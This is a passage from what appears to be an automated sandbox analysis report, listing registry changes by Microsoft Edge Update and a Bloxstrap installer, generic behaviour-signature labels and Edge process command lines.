| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CECDDD22-2E72-4832-9606-A9B0E5E344B2} | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB4F4A7E-977C-4E23-AD8F-626A491715DF}\NumMethods\ = "41" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E3D94CEB-EC11-46BE-8872-7DDCE37FABFA}\InprocHandler32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F7B3738C-9BCA-4B14-90B7-89D0F3A3E497}\ProxyStubClsid32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.PolicyStatusMachineFallback\ = "Google Update Policy Status Class" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6DFFE7FE-3153-4AF1-95D8-F8FCCA97E56B}\ProxyStubClsid32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FF419FF9-90BE-4D9F-B410-A789F90E5A7C}\Elevation\Enabled = "1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DDD4B5D4-FD54-497C-8789-0830F29A60EE} | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C06EE550-7248-488E-971E-B60C0AB3A6E4}\ProxyStubClsid32\ = "{8B15189E-5465-4166-933D-1EABAD9648CB}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{450CF5FF-95C4-4679-BECA-22680389ECB9}\NumMethods\ = "10" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.CoreMachineClass\ = "Microsoft Edge Update Core Class" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A6556DFF-AB15-4DC3-A890-AB54120BEAEC}\ = "IProcessLauncher2" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2603C88B-F971-4167-9DE1-871EE4A3DC84}\NumMethods | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C20433B3-0D4B-49F6-9B6C-6EE0FAE07837}\ProxyStubClsid32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3A49F783-1C7D-4D35-8F63-5C1C206B9B6E} | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26} | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{8B15189E-5465-4166-933D-1EABAD9648CB}\ = "PSFactoryBuffer" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9A6B447A-35E2-4F6B-A87B-5DEEBBFDAD17}\ProxyStubClsid32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB4F4A7E-977C-4E23-AD8F-626A491715DF} | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1B9063E4-3882-485E-8797-F28A0240782F} | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{5F6A18BB-6231-424B-8242-19E5BB94F8ED}\PROGID | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\CLASSES\APPID\MICROSOFTEDGEUPDATE.EXE | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\InprocServer32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2EC826CB-5478-4533-9015-7580B3B5E03A}\ProxyStubClsid32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2E1DD7EF-C12D-4F8E-8AD8-CF8CC265BAD0}\ProgID\ = "MicrosoftEdgeUpdate.CoreMachineClass.1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2E1DD7EF-C12D-4F8E-8AD8-CF8CC265BAD0}\LocalizedString = "@C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.171.39\\msedgeupdate.dll,-3000" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\roblox-player\shell\open\command | C:\Users\Admin\Downloads\Bloxstrap-v2.8.0.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A6B716CB-028B-404D-B72C-50E153DD68DA}\VersionIndependentProgID | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E3D94CEB-EC11-46BE-8872-7DDCE37FABFA}\InprocHandler32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.171.39\\psmachine_64.dll" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7B3B7A69-7D88-4847-A6BC-90E246A41F69}\ = "IAppVersion" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.ProcessLauncher\CLSID\ = "{08D832B9-D2FD-481F-98CF-904D00DF63CC}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A6556DFF-AB15-4DC3-A890-AB54120BEAEC}\NumMethods | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E421557C-0628-43FB-BF2B-7C9F8A4D067C}\Elevation\IconReference = "@C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.171.39\\msedgeupdate.dll,-1004" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{77857D02-7A25-4B67-9266-3E122A8F39E4}\LocalServer32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.Update3WebSvc.1.0\ = "Microsoft Edge Update Update3Web" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB} | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{8B15189E-5465-4166-933D-1EABAD9648CB}\InProcServer32\ThreadingModel = "Both" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E4518371-7326-4865-87F8-D9D3F3B287A3}\ = "IBrowserHttpRequest2" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5F9C80B5-9E50-43C9-887C-7C6412E110DF}\ProxyStubClsid32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7E29BE61-5809-443F-9B5D-CF22156694EB} | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C853632E-36CA-4999-B992-EC0D408CF5AB}\NumMethods\ = "10" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3E102DC6-1EDB-46A1-8488-61F71B35ED5F} | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.CredentialDialogMachine.1.0\ = "Microsoft Edge Update CredentialDialog" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB} | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3E102DC6-1EDB-46A1-8488-61F71B35ED5F}\NumMethods | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2EC826CB-5478-4533-9015-7580B3B5E03A} | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB4EE1FC-0A81-4F56-B0E2-248FB78051AF} | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.PolicyStatusMachine.1.0\CLSID\ = "{B5977F34-9264-4AC3-9B31-1224827FF6E8}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3A49F783-1C7D-4D35-8F63-5C1C206B9B6E}\ProxyStubClsid32\ = "{8B15189E-5465-4166-933D-1EABAD9648CB}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{79E0C401-B7BC-4DE5-8104-71350F3A9B67}\NumMethods | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{99F8E195-1042-4F89-A28C-89CDB74A14AE}\ProxyStubClsid32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C20433B3-0D4B-49F6-9B6C-6EE0FAE07837}\NumMethods | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5F9C80B5-9E50-43C9-887C-7C6412E110DF}\NumMethods | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9A6B447A-35E2-4F6B-A87B-5DEEBBFDAD17}\ProxyStubClsid32\ = "{8B15189E-5465-4166-933D-1EABAD9648CB}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6DFFE7FE-3153-4AF1-95D8-F8FCCA97E56B}\NumMethods | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E4518371-7326-4865-87F8-D9D3F3B287A3}\NumMethods\ = "4" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3E102DC6-1EDB-46A1-8488-61F71B35ED5F} | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E55B90F1-DA33-400B-B09E-3AFF7D46BD83}\ProxyStubClsid32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FF419FF9-90BE-4D9F-B410-A789F90E5A7C} | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FF419FF9-90BE-4D9F-B410-A789F90E5A7C}\Elevation | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\roblox\ = "URL: Roblox Protocol" | C:\Users\Admin\Downloads\Bloxstrap-v2.8.0.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D9AA3288-4EA7-4E67-AE60-D18EADCB923D} | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DDD4B5D4-FD54-497C-8789-0830F29A60EE}\NumMethods\ = "10" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{837E40DA-EB1B-440C-8623-0F14DF158DC0}\ = "IAppBundleWeb" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 446235.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Users\Admin\Downloads\Bloxstrap-v2.8.0.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Bloxstrap\Bloxstrap.exe\:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\Bloxstrap-v2.8.0.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Bloxstrap\Roblox\Player\RobloxPlayerBeta.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb171446f8,0x7ffb17144708,0x7ffb17144718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2232,16880834506977449923,6843917378117794308,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2252 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2232,16880834506977449923,6843917378117794308,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2232,16880834506977449923,6843917378117794308,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2900 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,16880834506977449923,6843917378117794308,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,16880834506977449923,6843917378117794308,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2232,16880834506977449923,6843917378117794308,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4720 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2232,16880834506977449923,6843917378117794308,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4720 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,16880834506977449923,6843917378117794308,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4808 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,16880834506977449923,6843917378117794308,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4824 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,16880834506977449923,6843917378117794308,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5104 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,16880834506977449923,6843917378117794308,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,16880834506977449923,6843917378117794308,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4336 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,16880834506977449923,6843917378117794308,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4296 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,16880834506977449923,6843917378117794308,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5664 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,16880834506977449923,6843917378117794308,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2740 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
